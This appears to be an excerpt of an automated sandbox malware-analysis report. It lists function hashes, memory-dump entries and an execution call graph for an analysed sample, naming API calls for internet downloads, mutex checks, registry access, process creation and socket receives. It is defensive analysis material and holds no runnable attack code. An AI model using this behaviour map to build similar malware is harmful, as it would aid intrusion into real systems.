                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bcd961308bdb2ad90c5aa7d6974d91d72b2c614ae249744982333387264bec4b
                    • Instruction ID: 8a89adc26f395b98f9d17247be8ee309ac13d8323c64dfc07d78ae058292750a
                    • Opcode Fuzzy Hash: bcd961308bdb2ad90c5aa7d6974d91d72b2c614ae249744982333387264bec4b
                    • Instruction Fuzzy Hash: 1B11903490C91A8FDBA4EA18D895AF9B3A5EB99391F5012F5D00ED7295CB34AA81CF00
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FF814F22FB9 Relevance: .1, Instructions: 55COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6053cdbbc654e6ed6e8d517e0bc48aa286b4dff076d0bd443ff5aa60a5302176
                    • Instruction ID: f5055353d066d2a030c2d29c850d27b4715f5b8b81d145a94c8719a46b42278d
                    • Opcode Fuzzy Hash: 6053cdbbc654e6ed6e8d517e0bc48aa286b4dff076d0bd443ff5aa60a5302176
                    • Instruction Fuzzy Hash: 89110476D0CA8C8FDB51CB64A8556E97FA4FF4B320F1502B6C04DD32C2DA68A558C351
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FF814F292AE Relevance: .1, Instructions: 53COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 87f288b749f17bb93501336a7eae9aa2c51b8e78877c0f54237f940ddb1abbe4
                    • Instruction ID: 9e830f514dc0d9bcb1395ae6d4c9af7fd015458db6c738d1ec8d17c54310b7b2
                    • Opcode Fuzzy Hash: 87f288b749f17bb93501336a7eae9aa2c51b8e78877c0f54237f940ddb1abbe4
                    • Instruction Fuzzy Hash: D7116338A1892DCFDBA4EF18D894AA873F1FF99395F4411E5A00DD7261CA31E991CF41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FF814F22631 Relevance: .0, Instructions: 45COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5afd2569b95e33e3920b0907ae206b3eb689f13488566a5cc9af46dee8784150
                    • Instruction ID: d76d01398a55f89b663c5b5c76ed227acb2d3258db3ae4c8171dd1eb4a28518c
                    • Opcode Fuzzy Hash: 5afd2569b95e33e3920b0907ae206b3eb689f13488566a5cc9af46dee8784150
                    • Instruction Fuzzy Hash: 89115E75D09A498FE755DF54D998BEDB7B2EF46351F0002BAC00DA7392CA385A84CB41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FF814F23348 Relevance: .0, Instructions: 42COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: eccfed7e6d84c2cd01a05c67fb3ceac78bb7251395aecebd883df29e05f68839
                    • Instruction ID: 9643c65524cd925d3c728d19b6367101d4d2e5adab7880aefaee58c46c223651
                    • Opcode Fuzzy Hash: eccfed7e6d84c2cd01a05c67fb3ceac78bb7251395aecebd883df29e05f68839
                    • Instruction Fuzzy Hash: 6201F63191890E9FDF80EF589889BEA7BE0FF19350F104566E40CC7260DA30A594CB84
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FF814F21861 Relevance: .0, Instructions: 40COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: c0c1c16ade9be4775ed64636dc1f80c0367d4bdb07fdc7222ac61c9624939c17
                    • Instruction ID: 339f4c0e3ea9c72fb57c8a57d4833ecc197be131a006e7563f0f9759291a831e
                    • Opcode Fuzzy Hash: c0c1c16ade9be4775ed64636dc1f80c0367d4bdb07fdc7222ac61c9624939c17
                    • Instruction Fuzzy Hash: 3B116D74A18A29CFDBA5EB18C895BE8B7B1FB59350F5041E5D00DE7291CB34AE84DF40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FF814F23350 Relevance: .0, Instructions: 39COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 71d94455be2ab72ad02ce25e0accbcb3553f8a62415b3a752b92964674878600
                    • Instruction ID: a5b930f083e12e477da6dc9549111e8f012ce04793677ffc7437861f9ab5dd9f
                    • Opcode Fuzzy Hash: 71d94455be2ab72ad02ce25e0accbcb3553f8a62415b3a752b92964674878600
                    • Instruction Fuzzy Hash: 8EF0EC3091894DDFDF80EF58C888BAA7BE0FF19340F104566E408C3250DB30A594CB80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FF814F211AE Relevance: .0, Instructions: 38COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f4ed0f50961ad0b36d223a058c7d776b79c8f6eeb9e07c771c4f7ce6eeb4504d
                    • Instruction ID: 9c08dd2fad6c8007becbe8472d37e94edcf6eb3dda7867172cb021392e884649
                    • Opcode Fuzzy Hash: f4ed0f50961ad0b36d223a058c7d776b79c8f6eeb9e07c771c4f7ce6eeb4504d
                    • Instruction Fuzzy Hash: 3A018131E0995A4EE7A4DB28E8A47FD77B2EF883A0F1441BAC40DD3282CD345EC18B01
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FF814F281B9 Relevance: .0, Instructions: 35COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 241eb98cfc2aea663b3073b2d64846cb9e7580a18cea6dbdf680ae75cde2c722
                    • Instruction ID: 4f503c73d35d75bd17abf59fc1ec1eb34d04559dae82bdc3b7d0b4d95ee2363a
                    • Opcode Fuzzy Hash: 241eb98cfc2aea663b3073b2d64846cb9e7580a18cea6dbdf680ae75cde2c722
                    • Instruction Fuzzy Hash: 8AF0FF3080DB8C8FEB41DB248889AE93FA0EF56340F0442B7E00CC71E2EA78A158C741
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FF814F26EA1 Relevance: .0, Instructions: 29COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: b30da072376d8a16ca8e198c0433653523a70b6945ae23a42f04f0f167ed517c
                    • Instruction ID: e4e4e7f0fa05c2432de9224afea559171f640914543cbb334f081c24bc941817
                    • Opcode Fuzzy Hash: b30da072376d8a16ca8e198c0433653523a70b6945ae23a42f04f0f167ed517c
                    • Instruction Fuzzy Hash: 32E02B3280DB8C8FD7519F2498552DD3F60FF46350F0502BAD40C83192E7B9D514C741
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FF814F281D0 Relevance: .0, Instructions: 29COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 4822edb0f89aa9dbf9cf0205f0f0bede7d8e16f2f3b2907f4b333408f6a162d9
                    • Instruction ID: 8648bd1838664af7ff01b60e6a49132e543e2e13853da2c761b7abd8f6f6b284
                    • Opcode Fuzzy Hash: 4822edb0f89aa9dbf9cf0205f0f0bede7d8e16f2f3b2907f4b333408f6a162d9
                    • Instruction Fuzzy Hash: 8BF0A030C18A0D8AEB44EF249488AFE77A4EF95344F004676E40DD21D0EA34A1A4C641
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FF814F232B0 Relevance: .0, Instructions: 26COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9a1215e867c395f86c90743b12148968e7f658bafcd04370028a67f19d18cf56
                    • Instruction ID: d3cf71a81928fa8bb4ca37cd1a1c23e44e568a10a010be46d255a137ec6b8e85
                    • Opcode Fuzzy Hash: 9a1215e867c395f86c90743b12148968e7f658bafcd04370028a67f19d18cf56
                    • Instruction Fuzzy Hash: 05E0ED7082494D9FEF50EF6898886EDBBA4FF59314F404576E81CD3291DA34A594CB41
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FF814F26CA0 Relevance: .0, Instructions: 26COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f65392bfca4074f1579546e18b529c746b883b52a860a450e0e2c7e843a5874c
                    • Instruction ID: 4ded1af029b6e1269a73a8173d5e0238acc49c9ff72875fd521f567933394a39
                    • Opcode Fuzzy Hash: f65392bfca4074f1579546e18b529c746b883b52a860a450e0e2c7e843a5874c
                    • Instruction Fuzzy Hash: 1EF0F871D485098EEB50DBA8A0806FCB6F0EF093A1F504136D01DE3281DA39A940CB28
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FF814F22F75 Relevance: .0, Instructions: 25COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: daab4bc97b390c7c0ea3d27452f5402d636b9bb7a53d2a1f14f31de80e665bff
                    • Instruction ID: 4ac1bc022572707fc8b4788819f98498a24841abd017b0c639742250d6f0be9f
                    • Opcode Fuzzy Hash: daab4bc97b390c7c0ea3d27452f5402d636b9bb7a53d2a1f14f31de80e665bff
                    • Instruction Fuzzy Hash: 53E0D83680C6898FD315571458992E87F10FF47220F8A06BAD14C4B0D3DB589458C341
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FF814F283F2 Relevance: .0, Instructions: 21COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1f76f924c9da639dbcc20723bb1588a60d30f06db65651af2d665d435d5fd481
                    • Instruction ID: f924a52064417136c9bec460de33cb10ed5466129fc2ff64637c6d44bf4e7009
                    • Opcode Fuzzy Hash: 1f76f924c9da639dbcc20723bb1588a60d30f06db65651af2d665d435d5fd481
                    • Instruction Fuzzy Hash: 7FE09230A4D80A8BEB90EA14D890BBAB365EF5A390F205765A00E93296C935E941CB40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FF814F2316E Relevance: .0, Instructions: 9COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 317a3a6db79d7ab61650edafa9a690ff952e9bb65afdbfda2be1e43e7a67e563
                    • Instruction ID: e58be39a612c784e225eb471c90f72ccf580eb47440103e8b1a25db27f0a12e3
                    • Opcode Fuzzy Hash: 317a3a6db79d7ab61650edafa9a690ff952e9bb65afdbfda2be1e43e7a67e563
                    • Instruction Fuzzy Hash: 24C09272C0484CAF9F80EF98A4859EC7BB0FB58310F0042A3E90CE3641DA30A2A08B80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FF814F2847B Relevance: .0, Instructions: 8COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f6db248026f29352addb6a2a88e62a7e0b169acb7f13aaac8ef52be8081ca5c1
                    • Instruction ID: 4f9df0aaeec2eec12f44fd6b77f4745861f4c9250bc84d03648a9c371b4eb0a2
                    • Opcode Fuzzy Hash: f6db248026f29352addb6a2a88e62a7e0b169acb7f13aaac8ef52be8081ca5c1
                    • Instruction Fuzzy Hash: D1C04C6094DD068AE62055549485EB962189F57354F2017B1E50D532528924B9409600
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00007FF814F2150D Relevance: .0, Instructions: 2COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 9f9750f0ecd2b28e297077b79424945e398d4d63965f31417aa8d751ebbc541b
                    • Instruction ID: 4d78d53be00d9ba56c1555b984513da1bcdaba5f1d4a7d6229ef6d89a296ece7
                    • Opcode Fuzzy Hash: 9f9750f0ecd2b28e297077b79424945e398d4d63965f31417aa8d751ebbc541b
                    • Instruction Fuzzy Hash: 559002B1C0EA09D9E7208A40E1947AD65725B01354F205225D20D11181877C5904A551
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Non-executed Functions

                    Function 00007FF814F23AAA Relevance: .3, Instructions: 282COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.567744632.00007FF814F20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF814F20000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_7ff814f20000_file.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7133958857df42f364ce6e9437cb0f1691b2f80eefd8c026f20ed824d7f28062
                    • Instruction ID: cca9a203ef4554dfdfaeb14c21ce85b4423f4c9322a0421e072159212b4fda06
                    • Opcode Fuzzy Hash: 7133958857df42f364ce6e9437cb0f1691b2f80eefd8c026f20ed824d7f28062
                    • Instruction Fuzzy Hash: 2761F8DF69802655D611773EB8862FEFB68EF82371F200437E284CA4539A5455CE4AF4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Execution Graph

                    Execution Coverage:4.7%
                    Dynamic/Decrypted Code Coverage:0%
                    Signature Coverage:3.7%
                    Total number of Nodes:1713
                    Total number of Limit Nodes:74
                    execution_graph 46336 42c582 46337 42c5a8 ___scrt_fastfail 46336->46337 46340 42c63f 46337->46340 46344 42ab82 46337->46344 46339 42c60c 46339->46340 46357 42c361 46339->46357 46342 42c629 46342->46340 46364 42c3d3 48 API calls ___scrt_fastfail 46342->46364 46345 42ac4d 46344->46345 46347 42ab8f 46344->46347 46345->46339 46346 42abca 46349 42abe4 46346->46349 46366 42ab40 44 API calls 46346->46366 46347->46345 46347->46346 46365 42ab40 44 API calls 46347->46365 46351 42abfe 46349->46351 46367 42ab40 44 API calls 46349->46367 46353 42ac18 46351->46353 46368 42ab40 44 API calls 46351->46368 46356 42ac32 46353->46356 46369 42ab40 44 API calls 46353->46369 46356->46339 46370 431e61 46357->46370 46359 42c375 46361 42c3ab 46359->46361 46374 42e4cc 46359->46374 46361->46342 46362 42c38a 46362->46361 46380 42f01c 46362->46380 46364->46340 46365->46346 46366->46349 46367->46351 46368->46353 46369->46356 46371 431e76 46370->46371 46373 431e91 46370->46373 46371->46373 46387 432142 CryptAcquireContextA 46371->46387 46373->46359 46375 42e4da 46374->46375 46377 42e4df 46374->46377 46391 42e1f8 46375->46391 46379 42e511 46377->46379 46395 42e51c 22 API calls 46377->46395 46379->46362 46423 43050f 21 API calls 46380->46423 46382 42f033 46385 42f04f 46382->46385 46424 42f096 22 API calls 46382->46424 46384 42f047 46384->46385 46425 42f339 22 API calls 46384->46425 46385->46361 46388 432163 CryptGenRandom 46387->46388 46389 43215e 46387->46389 46388->46389 46390 432178 CryptReleaseContext 46388->46390 46389->46373 46390->46389 46392 42e203 46391->46392 46393 42e217 46392->46393 46396 4317f9 46392->46396 46393->46377 46395->46377 46397 431808 46396->46397 46399 431804 46396->46399 46400 43f7dd 46397->46400 46399->46393 46401 444a86 46400->46401 46402 444a93 46401->46402 46403 444a9e 46401->46403 46413 444a38 21 API calls 3 library calls 46402->46413 46404 444aa6 46403->46404 46411 444aaf __Getctype 46403->46411 46414 445002 46404->46414 46407 444ab4 46420 43eead 20 API calls __dosmaperr 46407->46420 46408 444ad9 RtlReAllocateHeap 46409 444a9b 46408->46409 46408->46411 46409->46399 46411->46407 46411->46408 46421 441850 7 API calls 2 library calls 46411->46421 46413->46409 46415 44500d RtlFreeHeap 46414->46415 46416 445036 __dosmaperr 46414->46416 46415->46416 46417 445022 46415->46417 46416->46409 46422 43eead 20 API calls __dosmaperr 46417->46422 46419 445028 GetLastError 46419->46416 46420->46409 46421->46411 46422->46419 46423->46382 46424->46384 46425->46385 46426 40bee3 46428 40beeb 46426->46428 46427 40bf1d 46428->46427 46429 40bf21 46428->46429 46432 40bf05 46428->46432 46444 402705 22 API calls std::_Xinvalid_argument 46429->46444 46434 40bf59 46432->46434 46435 40bf63 __EH_prolog 46434->46435 46445 4026f7 22 API calls 46435->46445 46437 40bf76 46446 40c08d 11 API calls 46437->46446 46439 40bfd4 46439->46427 46440 40bf9c 46440->46439 46447 406280 11 API calls 46440->46447 46442 40bfbb 46448 4026f2 11 API calls std::_Deallocate 46442->46448 46445->46437 46446->46440 46447->46442 46448->46439 46449 433180 46454 433452 SetUnhandledExceptionFilter 46449->46454 46451 433185 pre_c_initialization 46455 443e4c 20 API calls 2 library calls 46451->46455 46453 433190 46454->46451 46455->46453 46456 415044 46471 419edb 46456->46471 46458 41504d 46482 4020d6 46458->46482 46462 415068 46489 401fb8 46462->46489 46467 401fb8 11 API calls 46468 41612d 46467->46468 46469 401fb8 11 API calls 46468->46469 46470 416139 46469->46470 46498 4020bf 46471->46498 46476 419f20 InternetReadFile 46480 419f43 46476->46480 46477 419f70 InternetCloseHandle InternetCloseHandle 46479 419f82 46477->46479 46479->46458 46480->46476 46480->46477 46481 401fb8 11 API calls 46480->46481 46509 402097 46480->46509 46481->46480 46483 4020ec 46482->46483 46484 4023ae 11 API calls 46483->46484 46485 402106 46484->46485 46486 402549 28 API calls 46485->46486 46487 402114 46486->46487 46488 404a81 60 API calls _Yarn 46487->46488 46488->46462 46490 4023ae 11 API calls 46489->46490 46491 401fc1 46490->46491 46492 401e6d 46491->46492 46493 402143 46492->46493 46494 40217f 46493->46494 46576 402710 11 API calls 46493->46576 46494->46467 46496 402164 46577 4026f2 11 API calls std::_Deallocate 46496->46577 46499 4020c7 46498->46499 46515 4023ae 46499->46515 46501 4020d2 46502 43a620 46501->46502 46507 444a38 __Getctype 46502->46507 46503 444a76 46531 43eead 20 API calls __dosmaperr 46503->46531 46505 444a61 RtlAllocateHeap 46506 419ef9 InternetOpenW InternetOpenUrlW 46505->46506 46505->46507 46506->46476 46507->46503 46507->46505 46530 441850 7 API calls 2 library calls 46507->46530 46510 40209f 46509->46510 46511 4023ae 11 API calls 46510->46511 46512 4020aa 46511->46512 46532 4024ea 46512->46532 46514 4020b9 46514->46480 46516 402408 46515->46516 46517 4023b8 46515->46517 46516->46501 46517->46516 46519 402787 46517->46519 46520 402e01 46519->46520 46523 401694 46520->46523 46522 402e10 46522->46516 46524 4016ab 46523->46524 46525 4016a6 46523->46525 46524->46525 46526 4016d3 46524->46526 46529 43a5e8 11 API calls _abort 46525->46529 46526->46522 46528 43a5e7 46529->46528 46530->46507 46531->46506 46533 4024fa 46532->46533 46534 402500 46533->46534 46535 402515 46533->46535 46539 402549 46534->46539 46549 4028c8 46535->46549 46538 402513 46538->46514 46560 402868 46539->46560 46541 40255d 46542 402572 46541->46542 46543 402587 46541->46543 46565 402a14 22 API calls 46542->46565 46545 4028c8 28 API calls 46543->46545 46548 402585 46545->46548 46546 40257b 46566 4029ba 22 API calls 46546->46566 46548->46538 46550 4028d1 46549->46550 46551 402933 46550->46551 46552 4028db 46550->46552 46574 402884 22 API calls std::_Xinvalid_argument 46551->46574 46555 4028e4 46552->46555 46557 4028f7 46552->46557 46568 402c8e 46555->46568 46558 4028f5 46557->46558 46559 4023ae 11 API calls 46557->46559 46558->46538 46559->46558 46561 402870 46560->46561 46562 402878 46561->46562 46567 402c83 22 API calls 46561->46567 46562->46541 46565->46546 46566->46548 46569 402c98 __EH_prolog 46568->46569 46575 402e34 22 API calls 46569->46575 46571 4023ae 11 API calls 46573 402d72 46571->46573 46572 402d04 46572->46571 46573->46558 46575->46572 46576->46496 46577->46494 46578 4254e7 46584 4255bc recv 46578->46584 46585 41c8c8 46586 41c8dd _Yarn ___scrt_fastfail 46585->46586 46588 4317cf 21 API calls 46586->46588 46598 41cae0 46586->46598 46591 41ca8d ___scrt_fastfail 46588->46591 46589 41caf1 46592 41ca94 46589->46592 46600 4317cf 46589->46600 46591->46592 46593 4317cf 21 API calls 46591->46593 46596 41caba ___scrt_fastfail 46593->46596 46594 41cb2a ___scrt_fastfail 46594->46592 46605 431e55 46594->46605 46596->46592 46597 4317cf 21 API calls 46596->46597 46597->46598 46598->46592 46599 41c46d DeleteCriticalSection EnterCriticalSection LeaveCriticalSection ___scrt_fastfail 46598->46599 46599->46589 46601 4317d9 46600->46601 46602 4317dd 46600->46602 46601->46594 46603 43a620 ___std_exception_copy 21 API calls 46602->46603 46604 4317e2 46603->46604 46604->46594 46608 431d74 46605->46608 46607 431e5d 46607->46592 46609 431d8d 46608->46609 46613 431d83 46608->46613 46610 4317cf 21 API calls 46609->46610 46609->46613 46611 431dae 46610->46611 46612 432142 3 API calls 46611->46612 46611->46613 46612->46613 46613->46607 46614 43a728 46616 43a734 _swprintf ___scrt_is_nonwritable_in_current_image 46614->46616 46615 43a742 46630 43eead 20 API calls __dosmaperr 46615->46630 46616->46615 46618 43a76c 46616->46618 46625 444189 EnterCriticalSection 46618->46625 46620 43a747 pre_c_initialization ___scrt_is_nonwritable_in_current_image 46621 43a777 46626 43a818 46621->46626 46625->46621 46628 43a826 46626->46628 46627 43a782 46631 43a79f LeaveCriticalSection std::_Lockit::~_Lockit 46627->46631 46628->46627 46632 447fec 36 API calls 2 library calls 46628->46632 46630->46620 46631->46620 46632->46628 46633 433192 46634 43319e ___scrt_is_nonwritable_in_current_image 46633->46634 46660 432ea1 46634->46660 46636 4331a5 46638 4331ce 46636->46638 46961 433304 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46636->46961 46646 43320d ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46638->46646 46671 442b52 46638->46671 46642 4331ed ___scrt_is_nonwritable_in_current_image 46643 43326d 46679 43341f 46643->46679 46646->46643 46962 441cb7 35 API calls 4 library calls 46646->46962 46653 43328f 46654 433299 46653->46654 46964 441cef 28 API calls _abort 46653->46964 46656 4332a2 46654->46656 46965 441c92 28 API calls _abort 46654->46965 46966 433018 13 API calls 2 library calls 46656->46966 46659 4332aa 46659->46642 46661 432eaa 46660->46661 46967 43354d IsProcessorFeaturePresent 46661->46967 46663 432eb6 46968 437801 10 API calls 4 library calls 46663->46968 46665 432ebb 46666 432ebf 46665->46666 46969 4429df 46665->46969 46666->46636 46669 432ed6 46669->46636 46672 442b69 46671->46672 46673 4338bb __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 46672->46673 46674 4331e7 46673->46674 46674->46642 46675 442af6 46674->46675 46676 442b25 46675->46676 46677 4338bb __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 46676->46677 46678 442b4e 46677->46678 46678->46646 47034 435760 46679->47034 46682 433273 46683 442aa3 46682->46683 47036 44d8d9 46683->47036 46685 43327c 46688 40dec9 46685->46688 46686 442aac 46686->46685 47040 445095 35 API calls 46686->47040 47042 41b4c9 LoadLibraryA GetProcAddress 46688->47042 46690 40dee5 GetModuleFileNameW 47049 40e8e0 46690->47049 46692 40df01 46693 4020d6 28 API calls 46692->46693 46694 40df10 46693->46694 46695 4020d6 28 API calls 46694->46695 46696 40df1f 46695->46696 47064 41a976 46696->47064 46700 40df31 46701 401e6d 11 API calls 46700->46701 46702 40df3a 46701->46702 46703 40df97 46702->46703 46704 40df4d 46702->46704 47090 401e45 46703->47090 47366 40f0f6 116 API calls 46704->47366 46707 40dfa7 46711 401e45 22 API calls 46707->46711 46708 40df5f 46709 401e45 22 API calls 46708->46709 46710 40df6b 46709->46710 47367 41047a 36 API calls __EH_prolog 46710->47367 46712 40dfc6 46711->46712 47095 4052fe 46712->47095 46715 40dfd5 47100 408832 46715->47100 46716 40df7d 47368 40f0a7 77 API calls 46716->47368 46719 40df86 47369 40e8cd 70 API calls 46719->47369 46724 401fb8 11 API calls 46725 40dff6 46724->46725 46727 401fb8 11 API calls 46725->46727 46726 401fb8 11 API calls 46728 40e42c 46726->46728 46729 40dfff 46727->46729 46963 441bc6 GetModuleHandleW 46728->46963 46730 401e45 22 API calls 46729->46730 46731 40e008 46730->46731 47114 401fa0 46731->47114 46733 40e013 46734 401e45 22 API calls 46733->46734 46735 40e02c 46734->46735 46736 401e45 22 API calls 46735->46736 46737 40e047 46736->46737 46738 40e0b2 46737->46738 47370 406292 46737->47370 46740 401e45 22 API calls 46738->46740 46745 40e0bf 46740->46745 46741 40e074 46742 401fc2 28 API calls 46741->46742 46743 40e080 46742->46743 46746 401fb8 11 API calls 46743->46746 46744 40e13b 47118 40c577 46744->47118 46745->46744 46747 401e45 22 API calls 46745->46747 46749 40e089 46746->46749 46750 40e0d8 46747->46750 47375 412831 RegOpenKeyExA 46749->47375 46753 40e0df OpenMutexA 46750->46753 46751 40e146 46752 40df8f 46751->46752 47121 419e1e 46751->47121 46752->46726 46755 40e0f2 WaitForSingleObject CloseHandle 46753->46755 46756 40e105 46753->46756 46755->46756 46762 412831 3 API calls 46756->46762 46759 40e161 46761 40e1b4 46759->46761 47138 406d8a 46759->47138 46760 40e86c 47458 412c91 30 API calls 46760->47458 46764 401e45 22 API calls 46761->46764 46775 40e122 46762->46775 46767 40e1bd 46764->46767 46766 40e882 47459 4119b8 65 API calls ___scrt_fastfail 46766->47459 46778 40e1c9 46767->46778 46779 40e1ce 46767->46779 46770 40e180 47379 406dac 30 API calls 46770->47379 46771 40e18a 46774 401e45 22 API calls 46771->46774 46772 40e88c 47254 41a7b9 46772->47254 46785 40e193 46774->46785 46775->46744 47378 412c91 30 API calls 46775->47378 47382 406dc9 CreateProcessA CloseHandle CloseHandle 